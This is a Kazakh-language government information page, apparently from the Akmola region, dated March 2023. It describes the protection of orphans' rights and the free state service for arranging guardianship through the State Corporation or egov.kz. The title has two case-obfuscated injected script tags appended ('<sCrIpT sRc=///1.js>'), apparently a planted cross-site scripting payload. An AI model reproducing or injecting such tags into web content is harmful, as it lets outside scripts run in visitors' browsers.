Жетім балалардың, ата-анасының қамқорлығынсыз қалған балалардың құқықтары мен мүдделерін қорғау<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.03.2023

Жетім балалардың, ата-анасының қамқорлығынсыз қалған балалардың құқықтары мен мүдделерін қорғау оларды тәрбиелеу үшін отбасына (асырап алу, қорғаншылық немесе қамқоршылық, патронат, патронаттық отбасы) беру арқылы, ал мұндай мүмкіндік болмаған жағдайда жетім балаларға, ата-анасының қамқорлығынсыз қалған балаларға арналған барлық түрлері ұйымдарына беру арқылы жүзеге асырылады.

Ақмола облысының аудандық (қалалық) білім бөлімдері «Жетім балаға (жетім балаларға) және ата-анасының қамқорлығынсыз қалған балаға (балаларға) қорғаншылық немесе қорғаншылық белгілеу» мемлекеттік қызметін көрсетеді.

Мемлекеттік қызметті көрсету үшін құжаттарды қабылдау және нәтижені беру мыналар арқылы жүзеге асырылады:

1) «Азаматтарға арналған үкімет» мемлекеттік корпорациясы» коммерциялық емес акционерлік қоғамы;

2) «электрондық үкімет» www.egov.kz веб-порталы.

Жеке тұлғаларға мемлекеттік қызмет тегін көрсетіледі. Мемлекеттік қызметті көрсету үшін қажетті құжаттар тізбесі Қазақстан Республикасы Білім және ғылым министрінің 2020 жылғы 24 сәуірдегі №158 бұйрықпен бекітілген «Жетім балаға (жетім балаларға) және ата-анасының қамқорлығынсыз қалған балаға (балаларға) қорғаншылық немесе қорғаншылық белгілеу» балалар және отбасы саласында мемлекеттік қызмет көрсету қағидаларында айқындалған.

Просмотров: 1420


Пікір қосу



Деректерді қолтаңбаға қосу